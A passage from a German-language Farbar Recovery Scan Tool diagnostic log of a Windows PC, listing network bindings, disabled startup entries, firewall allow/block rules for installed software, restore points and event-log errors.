(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)
HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Python310\Scripts\;C:\Python310\;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;%SYSTEMROOT%\System32\OpenSSH\;C:\Program Files\Git\cmd;C:\ProgramData\chocolatey\bin;C:\Program Files\nodejs\;C:\Program Files\Wireshark;;C:\Program Files\Microsoft VS Code\bin;C:\Program Files\Docker\Docker\resources\bin
HKU\S-1-5-21-1775496863-3233068474-2158662417-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Marcel\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper
HKU\S-1-5-21-1775496863-3233068474-2158662417-1002\Control Panel\Desktop\\Wallpaper -> C:\Users\Lisa\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalCache\Microsoft\IrisService\14087712868926777722\133800604814694731.jpg
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) ist aktiviert.

Network Binding:
=============
Ethernet 2: Realtek PCIe GbE Family Controller -> rt640x64.sys
WLAN: Realtek 8822BE Wireless LAN 802.11ac PCI-E NIC -> rtwlane.sys
Ethernet 6: TunnelBear Adapter V9 -> tap-tb-0901.sys
Bluetooth-Netzwerkverbindung: Bluetooth Device (Personal Area Network) -> bthpan.sys
vms_vsf: Erweiterungsfilter für virtuellen Hyper-V-Switch
oracle_VBoxNetLwf: VirtualBox NDIS6 Bridged Networking Driver
INSECURE_NPCAP: Npcap Packet Driver (NPCAP)
steamxboxndi: Steam Xbox Controller Enhanced Features Driver
vms_vsp: Extension-Protokoll für virtuellen Hyper-V-Switch

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)
HKLM\...\StartupApproved\StartupFolder: => "ScpToolkit Tray Notifications.lnk"
HKLM\...\StartupApproved\StartupFolder: => "AnyDesk.lnk"
HKLM\...\StartupApproved\Run: => "Acrobat Assistant 8.0"
HKLM\...\StartupApproved\Run: => "AdobeGCInvoker-1.0"
HKLM\...\StartupApproved\Run: => "RTKUGUI"
HKLM\...\StartupApproved\Run: => "SteelSeriesGG"
HKLM\...\StartupApproved\Run: => "Riot Vanguard"
HKLM\...\StartupApproved\Run32: => "Redirector"
HKLM\...\StartupApproved\Run32: => "ConnectionCenter"
HKLM\...\StartupApproved\Run32: => "AnalyticsSrv"
HKLM\...\StartupApproved\Run32: => "InstallHelper"
HKU\S-1-5-21-1775496863-3233068474-2158662417-1001\...\StartupApproved\Run: => "OneDrive"
HKU\S-1-5-21-1775496863-3233068474-2158662417-1001\...\StartupApproved\Run: => "Docker Desktop"
HKU\S-1-5-21-1775496863-3233068474-2158662417-1001\...\StartupApproved\Run: => "Adobe Acrobat Synchronizer"
HKU\S-1-5-21-1775496863-3233068474-2158662417-1001\...\StartupApproved\Run: => "EpicGamesLauncher"
HKU\S-1-5-21-1775496863-3233068474-2158662417-1001\...\StartupApproved\Run: => "Steam"
HKU\S-1-5-21-1775496863-3233068474-2158662417-1001\...\StartupApproved\Run: => "GoogleDriveFS"
HKU\S-1-5-21-1775496863-3233068474-2158662417-1001\...\StartupApproved\Run: => "LGHUB"
HKU\S-1-5-21-1775496863-3233068474-2158662417-1001\...\StartupApproved\Run: => "MicrosoftEdgeAutoLaunch_EAC21D00D4BC08C838A9AA4DBEEC9392"
HKU\S-1-5-21-1775496863-3233068474-2158662417-1001\...\StartupApproved\Run: => "EADM"
HKU\S-1-5-21-1775496863-3233068474-2158662417-1001\...\StartupApproved\Run: => "GoogleChromeAutoLaunch_11F810DC58703105CF0600BCC1ED96D2"
HKU\S-1-5-21-1775496863-3233068474-2158662417-1001\...\StartupApproved\Run: => "Discord"
HKU\S-1-5-21-1775496863-3233068474-2158662417-1002\...\StartupApproved\Run: => "OneDrive"

==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.
Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) FirewallRules: [{14192B1F-3475-4D35-A2A5-3AB1482DBF2D}] => (Allow) C:\Program Files\WindowsApps\MicrosoftTeams_23306.3316.2574.4550_x64__8wekyb3d8bbwe\msteams.exe => Keine Datei FirewallRules: [{FE3A2378-9FEF-42B1-9A5A-BB943D270785}] => (Allow) C:\Program Files\WindowsApps\MicrosoftTeams_23306.3316.2574.4550_x64__8wekyb3d8bbwe\msteams.exe => Keine Datei FirewallRules: [UDP Query User{C2EE2005-D80F-42EC-9F9B-C3D823189A11}C:\program files (x86)\qnap\qsync\qsync.exe] => (Allow) C:\program files (x86)\qnap\qsync\qsync.exe (QNAP Systems, Inc. -> QNAP Systems, Inc.) FirewallRules: [TCP Query User{EEBB902A-3FD2-48CB-B058-367D7EE82C48}C:\program files (x86)\qnap\qsync\qsync.exe] => (Allow) C:\program files (x86)\qnap\qsync\qsync.exe (QNAP Systems, Inc. -> QNAP Systems, Inc.) FirewallRules: [{334347C5-59AB-4AA9-BD76-ED1BB39AE754}] => (Allow) D:\SteamLibrary\steamapps\common\Pioneers of Pagonia Demo\Pioneers of Pagonia.exe (Envision Entertainment GmbH) [Datei ist nicht signiert] FirewallRules: [{ACB1A1BD-ADC8-4CD3-856D-2FB97EBE905E}] => (Allow) D:\SteamLibrary\steamapps\common\Pioneers of Pagonia Demo\Pioneers of Pagonia.exe (Envision Entertainment GmbH) [Datei ist nicht signiert] FirewallRules: [UDP Query User{8FB7045B-81C6-41E9-A885-B0DAE6F5BC76}C:\users\marcel\.platformio\python3\python.exe] => (Allow) C:\users\marcel\.platformio\python3\python.exe (Python Software Foundation -> Python Software Foundation) FirewallRules: [TCP Query User{19576FC3-0578-4EC8-9B43-76A2291DCB12}C:\users\marcel\.platformio\python3\python.exe] => (Allow) C:\users\marcel\.platformio\python3\python.exe (Python Software Foundation -> Python Software Foundation) FirewallRules: [UDP Query User{0E3A8E1D-80B6-4FC0-A10C-9FC17E143435}C:\program files (x86)\arduino\java\bin\javaw.exe] => (Allow) C:\program files (x86)\arduino\java\bin\javaw.exe FirewallRules: [TCP Query User{4C7D98A8-E85A-48A4-AFF4-42DA92246BAD}C:\program files 
(x86)\arduino\java\bin\javaw.exe] => (Allow) C:\program files (x86)\arduino\java\bin\javaw.exe FirewallRules: [{15021C5D-92CA-4AB8-9506-0DF81D1436EB}] => (Allow) D:\SteamLibrary\steamapps\common\Cities_Skylines\dowser.exe (Paradox Interactive AB (publ) -> ) FirewallRules: [{E128803B-DD01-404A-BE2B-2DE6B24D4123}] => (Allow) D:\SteamLibrary\steamapps\common\Cities_Skylines\dowser.exe (Paradox Interactive AB (publ) -> ) FirewallRules: [{C1BD47C4-1822-417A-B5EA-3CB226E1B4E1}] => (Allow) C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EALaunchHelper.exe (Electronic Arts, Inc. -> Electronic Arts) FirewallRules: [{428E43B9-BF5D-4D89-8C5E-70189A75BB9A}] => (Allow) C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EALocalHostSvc.exe (Electronic Arts, Inc. -> Electronic Arts) FirewallRules: [{0A263C69-66E1-4D5B-BC83-0952EB0DB473}] => (Allow) C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EALocalHostSvc.exe (Electronic Arts, Inc. -> Electronic Arts) FirewallRules: [{EDA696DE-7982-4352-B45C-3276DFC18818}] => (Allow) C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EAGEP.exe (Electronic Arts, Inc. -> Electronic Arts) FirewallRules: [{32836274-E5B1-48B9-A1F6-02E554E886DC}] => (Allow) C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EAGEP.exe (Electronic Arts, Inc. -> Electronic Arts) FirewallRules: [{90CE52F5-C388-4CF5-9CCD-214862C118EF}] => (Allow) C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EADesktop.exe (Electronic Arts, Inc. -> Electronic Arts) FirewallRules: [{4527B228-F197-4B7A-A2CE-1E3DC68DD14A}] => (Allow) C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EADesktop.exe (Electronic Arts, Inc. -> Electronic Arts) FirewallRules: [{57C795AE-B95B-44D5-BB91-922E1176E72B}] => (Allow) C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EAConnect_microsoft.exe (Electronic Arts, Inc. 
-> Electronic Arts) FirewallRules: [{76F4A360-BF46-4CCD-99DA-B2BE547D046D}] => (Allow) C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EAConnect_microsoft.exe (Electronic Arts, Inc. -> Electronic Arts) FirewallRules: [{A287667A-8C2B-4A38-949A-EDD394C05B7D}] => (Allow) C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EABackgroundService.exe (Electronic Arts, Inc. -> Electronic Arts) FirewallRules: [{74CB5C39-8B99-43C8-961A-88F145BC181D}] => (Allow) C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EABackgroundService.exe (Electronic Arts, Inc. -> Electronic Arts) FirewallRules: [UDP Query User{B9C5081C-1D1D-4433-8EB8-874716DA5CD3}D:\epic games\amongus\among us.exe] => (Block) D:\epic games\amongus\among us.exe () [Datei ist nicht signiert] FirewallRules: [TCP Query User{3F072579-0AA2-4944-9A69-4E220AF6F95F}D:\epic games\amongus\among us.exe] => (Block) D:\epic games\amongus\among us.exe () [Datei ist nicht signiert] FirewallRules: [UDP Query User{7C420908-A0EC-4375-9EAF-A95572A1E596}C:\program files (x86)\epic games\launcher\engine\binaries\win64\epicwebhelper.exe] => (Allow) C:\program files (x86)\epic games\launcher\engine\binaries\win64\epicwebhelper.exe (Epic Games Inc. -> Epic Games, Inc.) FirewallRules: [TCP Query User{E9BC4477-E4D8-4740-9D22-DD2F1B2E66F2}C:\program files (x86)\epic games\launcher\engine\binaries\win64\epicwebhelper.exe] => (Allow) C:\program files (x86)\epic games\launcher\engine\binaries\win64\epicwebhelper.exe (Epic Games Inc. -> Epic Games, Inc.) FirewallRules: [{84D3A0EC-E02B-4261-90D1-FB7FA75C9FAA}] => (Allow) D:\SteamLibrary\steamapps\common\TerraScape\TerraScape.exe () [Datei ist nicht signiert] FirewallRules: [{CBBB11BB-A736-4F1E-8444-D8BDF1B11B96}] => (Allow) D:\SteamLibrary\steamapps\common\TerraScape\TerraScape.exe () [Datei ist nicht signiert] FirewallRules: [{295F88FF-DD8A-4942-967E-7578CEE0FC94}] => (Allow) D:\SteamLibrary\steamapps\common\Satisfactory\FactoryGame.exe (Epic Games, Inc.) 
[Datei ist nicht signiert] FirewallRules: [{18A96541-0DBB-4EB4-8B8B-8314EADC8D51}] => (Allow) D:\SteamLibrary\steamapps\common\Satisfactory\FactoryGame.exe (Epic Games, Inc.) [Datei ist nicht signiert] FirewallRules: [UDP Query User{B0E3AE4E-B64A-4061-8687-318421A0A9B9}D:\riot games\riot client\riotclientservices.exe] => (Block) D:\riot games\riot client\riotclientservices.exe (Riot Games, Inc. -> Riot Games, Inc.) FirewallRules: [TCP Query User{F2EBABA9-1CDD-419C-ACE9-51F9E13B8BCB}D:\riot games\riot client\riotclientservices.exe] => (Block) D:\riot games\riot client\riotclientservices.exe (Riot Games, Inc. -> Riot Games, Inc.) FirewallRules: [UDP Query User{651175E5-6EB8-4612-8346-71EF36EA5FC3}D:\steamlibrary\steamapps\common\battlefield 2042\bf2042.exe] => (Block) D:\steamlibrary\steamapps\common\battlefield 2042\bf2042.exe => Keine Datei FirewallRules: [TCP Query User{FB46DCF6-A97F-4E7F-A165-E83EBA515D0B}D:\steamlibrary\steamapps\common\battlefield 2042\bf2042.exe] => (Block) D:\steamlibrary\steamapps\common\battlefield 2042\bf2042.exe => Keine Datei FirewallRules: [{E52D17CE-B2B9-40C7-B858-E3F66DFED41F}] => (Allow) C:\Program Files\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH) FirewallRules: [{52E2EDD7-2470-49C9-B770-2A601D58F4C5}] => (Allow) C:\Program Files\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH) FirewallRules: [{DC7C4E43-F3CE-4EBC-A315-F7D7DB475956}] => (Allow) C:\Program Files\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH) FirewallRules: [{390190E8-BC8B-451F-A993-2C21F096D02D}] => (Allow) C:\Program Files\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH) FirewallRules: [UDP Query User{066F638E-53EA-471B-8908-83C6D1FB0C35}C:\program files (x86)\arduino\java\bin\javaw.exe] => (Allow) C:\program files (x86)\arduino\java\bin\javaw.exe FirewallRules: [TCP Query User{6BA38EF5-46C2-40A8-A2F3-C7D698739041}C:\program 
files (x86)\arduino\java\bin\javaw.exe] => (Allow) C:\program files (x86)\arduino\java\bin\javaw.exe FirewallRules: [{16503204-0D3E-4EAB-84E6-452A2987DA32}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Planetbase\Planetbase.exe (Unity Technologies SF -> ) [Datei ist nicht signiert] FirewallRules: [{752E924D-7035-4CC2-9C57-A29E45DF53A6}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Planetbase\Planetbase.exe (Unity Technologies SF -> ) [Datei ist nicht signiert] FirewallRules: [UDP Query User{3EE66D67-6304-4E09-B3BB-C22A4DD1CEC0}C:\program files (x86)\epic games\launcher\engine\binaries\win64\epicwebhelper.exe] => (Allow) C:\program files (x86)\epic games\launcher\engine\binaries\win64\epicwebhelper.exe (Epic Games Inc. -> Epic Games, Inc.) FirewallRules: [TCP Query User{A149D780-B99A-4380-A7E2-EB17DECC26DB}C:\program files (x86)\epic games\launcher\engine\binaries\win64\epicwebhelper.exe] => (Allow) C:\program files (x86)\epic games\launcher\engine\binaries\win64\epicwebhelper.exe (Epic Games Inc. -> Epic Games, Inc.) FirewallRules: [{8DBDF2B4-95D6-4012-A9C7-126DED9AC42E}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe (Valve Corp. -> Valve Corporation) FirewallRules: [{009C4255-171E-4759-A1A2-9EA6827C2C19}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe (Valve Corp. -> Valve Corporation) FirewallRules: [{4DBB9852-C924-4BC4-AC76-E577155C0BD6}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe (Valve Corp. -> Valve Corporation) FirewallRules: [{2A6593E8-7F73-4B76-97E7-0F67D75D9CD5}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe (Valve Corp. 
-> Valve Corporation) FirewallRules: [{745DC4C0-3E19-41F4-BFDE-B7BBBD8E43CA}] => (Allow) LPort=24800 FirewallRules: [UDP Query User{C58B4C03-3FFA-46F2-A84F-91E108FF6779}C:\program files\nodejs\node.exe] => (Allow) C:\program files\nodejs\node.exe (OpenJS Foundation -> Node.js) FirewallRules: [TCP Query User{CED3DA51-BE66-4555-8693-A3EDB2DB9E88}C:\program files\nodejs\node.exe] => (Allow) C:\program files\nodejs\node.exe (OpenJS Foundation -> Node.js) FirewallRules: [UDP Query User{87A451E7-366A-4005-886E-12EB2857ED14}C:\program files\docker\docker\resources\com.docker.backend.exe] => (Allow) C:\program files\docker\docker\resources\com.docker.backend.exe (Docker Inc -> Docker Inc.) FirewallRules: [TCP Query User{89381732-1477-4D3F-B5D8-7B5945572169}C:\program files\docker\docker\resources\com.docker.backend.exe] => (Allow) C:\program files\docker\docker\resources\com.docker.backend.exe (Docker Inc -> Docker Inc.) FirewallRules: [{87A3E154-D589-418D-A672-EDA88216CC7B}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation) FirewallRules: [{9C74AE9E-80F7-482E-932F-CF0857F152C1}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation) FirewallRules: [{E8057188-0755-4717-8BAB-CA9D3B8A6C76}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\Lync.exe (Microsoft Corporation -> Microsoft Corporation) FirewallRules: [{32679342-8A44-41B8-8C76-D9FA2382D65B}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\Lync.exe (Microsoft Corporation -> Microsoft Corporation) FirewallRules: [{3D57F7D4-41AE-4AF6-BF71-FD1A695E22B0}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\outlook.exe (Microsoft Corporation -> Microsoft Corporation) FirewallRules: [UDP Query User{B8555902-6D77-4A7C-8F74-AA193E4E9B8C}D:\program files (x86)\qnap\qsync\qsync.exe] => (Block) D:\program files (x86)\qnap\qsync\qsync.exe => Keine Datei FirewallRules: 
[TCP Query User{5045EC28-4D7A-4F50-BC63-212E86FC593B}D:\program files (x86)\qnap\qsync\qsync.exe] => (Block) D:\program files (x86)\qnap\qsync\qsync.exe => Keine Datei FirewallRules: [{BEC48A7A-6B64-4C4D-89F3-65CEFF23AE40}] => (Allow) C:\Program Files\Zoom\bin\airhost.exe (Zoom Video Communications, Inc. -> Zoom Video Communications, Inc.) FirewallRules: [{91244D45-C787-4DDC-B450-280B0304B732}] => (Allow) C:\Program Files\Zoom\bin\airhost.exe (Zoom Video Communications, Inc. -> Zoom Video Communications, Inc.) FirewallRules: [{05524846-2956-4CA0-A618-6C581D831256}] => (Allow) C:\Program Files\Zoom\bin\Zoom.exe (Zoom Video Communications, Inc. -> Zoom Video Communications, Inc.) FirewallRules: [TCP Query User{C4BFA07D-2F99-4B5B-B86B-C80A9E39C8C0}C:\program files (x86)\qnap\qsync\qsync.exe] => (Allow) C:\program files (x86)\qnap\qsync\qsync.exe (QNAP Systems, Inc. -> QNAP Systems, Inc.) FirewallRules: [UDP Query User{EB93A807-36E6-4F5A-B86D-168C6949A5FE}C:\program files (x86)\qnap\qsync\qsync.exe] => (Allow) C:\program files (x86)\qnap\qsync\qsync.exe (QNAP Systems, Inc. -> QNAP Systems, Inc.) 
FirewallRules: [TCP Query User{6438087A-CDBC-467F-BF2B-5671111D6678}C:\users\marcel\appdata\roaming\mobaxterm\slash\bin\xwin_mobax.exe] => (Allow) C:\users\marcel\appdata\roaming\mobaxterm\slash\bin\xwin_mobax.exe (Mobatek -> Mobatek) FirewallRules: [UDP Query User{60606262-430A-4F5D-B5D0-B3119ADB8573}C:\users\marcel\appdata\roaming\mobaxterm\slash\bin\xwin_mobax.exe] => (Allow) C:\users\marcel\appdata\roaming\mobaxterm\slash\bin\xwin_mobax.exe (Mobatek -> Mobatek) FirewallRules: [{21230499-3AE8-4550-882F-819ED1517A38}] => (Allow) C:\Program Files\WindowsApps\MicrosoftTeams_24060.3103.2805.2099_x64__8wekyb3d8bbwe\msteams.exe (Microsoft Corporation -> Microsoft Corporation) FirewallRules: [{0B0B602D-A0DF-4116-969E-D8495CEF680A}] => (Allow) C:\Program Files\WindowsApps\MicrosoftTeams_24060.3103.2805.2099_x64__8wekyb3d8bbwe\msteams.exe (Microsoft Corporation -> Microsoft Corporation) FirewallRules: [{9AF989AC-01E0-4D23-B4C1-71FB206107DA}] => (Allow) C:\Program Files (x86)\Citrix\ICA Client\CitrixEnterpriseBrowser\CitrixEnterpriseBrowser.exe (Citrix Systems, Inc. -> Citrix Systems, Inc.) FirewallRules: [{6A9B1CF6-65A3-4D35-9967-0DB54C567DD1}] => (Allow) C:\Program Files\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH) FirewallRules: [{5A341A2F-98F0-4C81-91A5-347CEC96B3C1}] => (Allow) C:\Program Files\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH) FirewallRules: [{66AEB5EE-1F81-40EF-943B-BEDE056C1FD8}] => (Allow) C:\Program Files\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH) FirewallRules: [{88FD7BEB-A698-47A7-873C-C2BA5101A264}] => (Allow) C:\Program Files\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH) FirewallRules: [TCP Query User{21C7DCC2-00B0-450B-9E7A-52D1D9FE2D4A}C:\program files (x86)\citrix\ica client\hdxrtcengine.exe] => (Allow) C:\program files (x86)\citrix\ica client\hdxrtcengine.exe (Citrix Systems, Inc. 
-> Citrix Systems, Inc.) FirewallRules: [UDP Query User{A9E14A45-9354-47AC-B502-080794FD200B}C:\program files (x86)\citrix\ica client\hdxrtcengine.exe] => (Allow) C:\program files (x86)\citrix\ica client\hdxrtcengine.exe (Citrix Systems, Inc. -> Citrix Systems, Inc.) FirewallRules: [TCP Query User{8474D892-F860-4D91-A3EC-D86EAE74326E}C:\program files (x86)\citrix\ica client\hdxrtcengine.exe] => (Allow) C:\program files (x86)\citrix\ica client\hdxrtcengine.exe (Citrix Systems, Inc. -> Citrix Systems, Inc.) FirewallRules: [UDP Query User{260D116A-0177-404A-8473-CEDF2BB24B98}C:\program files (x86)\citrix\ica client\hdxrtcengine.exe] => (Allow) C:\program files (x86)\citrix\ica client\hdxrtcengine.exe (Citrix Systems, Inc. -> Citrix Systems, Inc.) FirewallRules: [{230382F7-748A-4A22-A642-1F953C2258EF}] => (Allow) C:\Program Files (x86)\Citrix\ICA Client\CitrixEnterpriseBrowser\CitrixEnterpriseBrowser.exe (Citrix Systems, Inc. -> Citrix Systems, Inc.) FirewallRules: [{B8DF5061-C386-4E72-8013-F20C2109C3F5}] => (Allow) C:\Program Files\WindowsApps\MicrosoftTeams_24295.401.3195.9406_x64__8wekyb3d8bbwe\msteams.exe (Microsoft Corporation -> Microsoft Corporation) FirewallRules: [{5F744424-E9EF-4E96-97E7-C6D961EFF32A}] => (Allow) C:\Program Files\WindowsApps\MicrosoftTeams_24295.401.3195.9406_x64__8wekyb3d8bbwe\msteams.exe (Microsoft Corporation -> Microsoft Corporation) FirewallRules: [TCP Query User{CE0B260C-69F6-47E6-8E9A-23BE0D849B38}C:\users\marcel\appdata\local\arduino15\packages\esp32\hardware\esp32\2.0.11\tools\espota.exe] => (Allow) C:\users\marcel\appdata\local\arduino15\packages\esp32\hardware\esp32\2.0.11\tools\espota.exe () [Datei ist nicht signiert] FirewallRules: [UDP Query User{AA605C87-505D-4FB2-8D90-552614DC7436}C:\users\marcel\appdata\local\arduino15\packages\esp32\hardware\esp32\2.0.11\tools\espota.exe] => (Allow) C:\users\marcel\appdata\local\arduino15\packages\esp32\hardware\esp32\2.0.11\tools\espota.exe () [Datei ist nicht signiert] FirewallRules: 
[{F7711F94-5AC3-4B2D-886B-998DA191948F}] => (Allow) C:\Program Files\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC) FirewallRules: [{ACC1F7AF-93E2-4244-80BD-4BAA9CDE2789}] => (Allow) C:\Program Files (x86)\Microsoft\EdgeWebView\Application\131.0.2903.112\msedgewebview2.exe (Microsoft Corporation -> Microsoft Corporation) FirewallRules: [{7509DE1C-6A1C-4837-979D-1F8A5E49BA2A}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.253.438.0_x64__zpdnekdrzrea0\Spotify.exe (453637B3-4E12-4CDF-B0D3-2A3C863BF6EF -> Spotify Ltd) FirewallRules: [{F79AA383-4EF6-4F15-A3AE-856663C07C58}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.253.438.0_x64__zpdnekdrzrea0\Spotify.exe (453637B3-4E12-4CDF-B0D3-2A3C863BF6EF -> Spotify Ltd) FirewallRules: [{BD49D64A-9374-490A-B8D4-4EC41BEFA6AC}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.253.438.0_x64__zpdnekdrzrea0\Spotify.exe (453637B3-4E12-4CDF-B0D3-2A3C863BF6EF -> Spotify Ltd) FirewallRules: [{65FA002A-522F-429F-866D-E8D8D1CF63EA}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.253.438.0_x64__zpdnekdrzrea0\Spotify.exe (453637B3-4E12-4CDF-B0D3-2A3C863BF6EF -> Spotify Ltd) FirewallRules: [{7E3320C4-8DBE-4E3C-9AC4-21E3DD7B129F}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.253.438.0_x64__zpdnekdrzrea0\Spotify.exe (453637B3-4E12-4CDF-B0D3-2A3C863BF6EF -> Spotify Ltd) FirewallRules: [{24A1B116-7896-497F-9313-DCEC9095FB32}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.253.438.0_x64__zpdnekdrzrea0\Spotify.exe (453637B3-4E12-4CDF-B0D3-2A3C863BF6EF -> Spotify Ltd) FirewallRules: [{01333AA6-7760-41A8-B634-9D1CE59E313C}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.253.438.0_x64__zpdnekdrzrea0\Spotify.exe (453637B3-4E12-4CDF-B0D3-2A3C863BF6EF -> Spotify Ltd) FirewallRules: [{56A6E1CD-0FB6-40BD-A77E-0B8B3DA39023}] => (Allow) C:\Program 
Files\WindowsApps\SpotifyAB.SpotifyMusic_1.253.438.0_x64__zpdnekdrzrea0\Spotify.exe (453637B3-4E12-4CDF-B0D3-2A3C863BF6EF -> Spotify Ltd) FirewallRules: [{C7A60824-204A-4C2C-A2EA-F037A30F2389}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.253.438.0_x64__zpdnekdrzrea0\Spotify.exe (453637B3-4E12-4CDF-B0D3-2A3C863BF6EF -> Spotify Ltd) FirewallRules: [{D77CD640-13FC-4A07-B269-0D1E06AFCC61}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.253.438.0_x64__zpdnekdrzrea0\Spotify.exe (453637B3-4E12-4CDF-B0D3-2A3C863BF6EF -> Spotify Ltd) FirewallRules: [{923461BC-67C1-431B-A82A-7813AB3591D8}] => (Allow) C:\Program Files\WindowsApps\MSTeams_24335.208.3315.1951_x64__8wekyb3d8bbwe\ms-teams.exe (Microsoft Corporation -> Microsoft Corporation) FirewallRules: [{0B7EB3DD-1209-4054-8F1B-6F985DC26863}] => (Allow) C:\Program Files\WindowsApps\MSTeams_24335.208.3315.1951_x64__8wekyb3d8bbwe\ms-teams.exe (Microsoft Corporation -> Microsoft Corporation) FirewallRules: [{5CF179D7-C4F3-4060-9674-083A53860929}] => (Allow) C:\Program Files (x86)\AnyDesk\AnyDesk.exe (AnyDesk Software GmbH -> AnyDesk Software GmbH) FirewallRules: [{D7419AAC-1E92-470D-9F95-AE9FA2918D79}] => (Allow) C:\Program Files (x86)\AnyDesk\AnyDesk.exe (AnyDesk Software GmbH -> AnyDesk Software GmbH) FirewallRules: [{AC0F6B97-5254-4011-945C-C2BA8B2DC1B6}] => (Allow) C:\Program Files (x86)\AnyDesk\AnyDesk.exe (AnyDesk Software GmbH -> AnyDesk Software GmbH) FirewallRules: [{B30769F3-C72E-4977-81AD-52D3FE8A9429}] => (Allow) C:\Program Files (x86)\AnyDesk\AnyDesk.exe (AnyDesk Software GmbH -> AnyDesk Software GmbH) FirewallRules: [{6D0D70AD-9205-438D-8AE3-4C9DA1BD94BA}] => (Allow) C:\Program Files (x86)\AnyDesk\AnyDesk.exe (AnyDesk Software GmbH -> AnyDesk Software GmbH) FirewallRules: [{9DB8F727-D1E8-4E18-916B-50E666A373A4}] => (Allow) C:\Program Files (x86)\AnyDesk\AnyDesk.exe (AnyDesk Software GmbH -> AnyDesk Software GmbH) ==================== Wiederherstellungspunkte 
========================= 19-12-2024 20:58:49 Windows Update 27-12-2024 08:17:15 Windows Update 06-01-2025 08:29:44 Geplanter Prüfpunkt ==================== Fehlerhafte Geräte im Gerätemanager ============ ==================== Fehlereinträge in der Ereignisanzeige: ======================== Applikationsfehler: ================== Error: (12/30/2024 10:30:58 PM) (Source: VSS) (EventID: 8193) (User: ) Description: Volumeschattenkopie-Dienstfehler: Beim Aufrufen von Routine "CoCreateInstance" ist ein unerwarteter Fehler aufgetreten. hr = 0x8007045b, Der Computer wird heruntergefahren.. Error: (12/30/2024 10:30:58 PM) (Source: VSS) (EventID: 13) (User: ) Description: Volumenschattenkopie-Dienst-Informationen: Der COM-Server mit CLSID {4e14fba2-2e22-11d1-9964-00c04fbbb345} und dem Namen "CEventSystem" kann nicht gestartet werden. [0x8007045b, Der Computer wird heruntergefahren.] Error: (12/30/2024 10:29:56 PM) (Source: VSS) (EventID: 13) (User: ) Description: Volumenschattenkopie-Dienst-Informationen: Der COM-Server mit CLSID {4e14fba2-2e22-11d1-9964-00c04fbbb345} und dem Namen "CEventSystem" kann nicht gestartet werden. [0x8007045b, Der Computer wird heruntergefahren.] Error: (12/30/2024 10:28:45 PM) (Source: Microsoft-Windows-User Profiles Service) (EventID: 1512) (User: NT-AUTORITÄT) Description: Die Registrierungsdatei konnte nicht entladen werden. Der für die Registrierung verwendete Arbeitsspeicher wurde nicht freigegeben. Dieses wird oft durch Dienste verursacht, die unter einem Benutzerkonto ausgeführt werden. Versuchen Sie die Dienste entweder unter dem Konto "LocalService" oder "NetworkService" auszuführen. Details - Zugriff verweigert Error: (12/30/2024 10:28:45 PM) (Source: Microsoft-Windows-User Profiles Service) (EventID: 1512) (User: NT-AUTORITÄT) Description: Die Registrierungsdatei konnte nicht entladen werden. Der für die Registrierung verwendete Arbeitsspeicher wurde nicht freigegeben. 
